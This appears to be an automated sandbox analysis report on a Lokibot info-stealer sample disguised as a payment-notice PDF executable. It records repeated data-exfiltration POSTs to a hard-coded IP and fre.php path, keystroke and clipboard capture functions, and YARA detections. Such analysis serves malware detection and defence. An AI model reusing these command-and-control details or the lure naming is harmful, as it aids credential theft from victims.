Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 149Connection: close
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.150.73
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 107.175.150.73Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: EBCE8AE2Content-Length: 176Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2019 08:39:53 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Urls found in memory or binary dataShow sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000002.2174873937.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://107.175.150.73/~giftioz/.vokol/fre.php
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to read the clipboard dataShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00428C70 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_00428C70
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004536D8 GetKeyboardState,0_2_004536D8
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1757187830.00000000007B0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.29c0000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0047137C NtdllDefWindowProc_A,0_2_0047137C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004323E4 NtdllDefWindowProc_A,0_2_004323E4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00456654 NtdllDefWindowProc_A,GetCapture,0_2_00456654
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0046662C GetSubMenu,SaveDC,RestoreDC,7361B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0046662C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00471B24 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00471B24
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_00471BD4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00471BD4
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0043C24C0_2_0043C24C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0046662C0_2_0046662C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_004416A40_2_004416A4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 0_2_0046B8740_2_0046B874
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_0040549C2_2_0040549C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_2_004029D42_2_004029D4
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_1_0040549C2_1_0040549C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: 2_1_004029D42_1_004029D4
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: String function: 00403F5C appears 93 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: String function: 00406370 appears 63 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: String function: 00405B6F appears 84 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: String function: 00404BEE appears 56 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: String function: 00404B22 appears 54 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: String function: 00412093 appears 40 times
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeCode function: String function: 0041219C appears 90 times
PE file contains strange resourcesShow sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe, 00000000.00000002.1756992108.0000000000780000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Yara signature matchShow sources
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1759806044.00000000029C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.1755498220.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1757511531.0000000002440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2174747266.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.2440000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
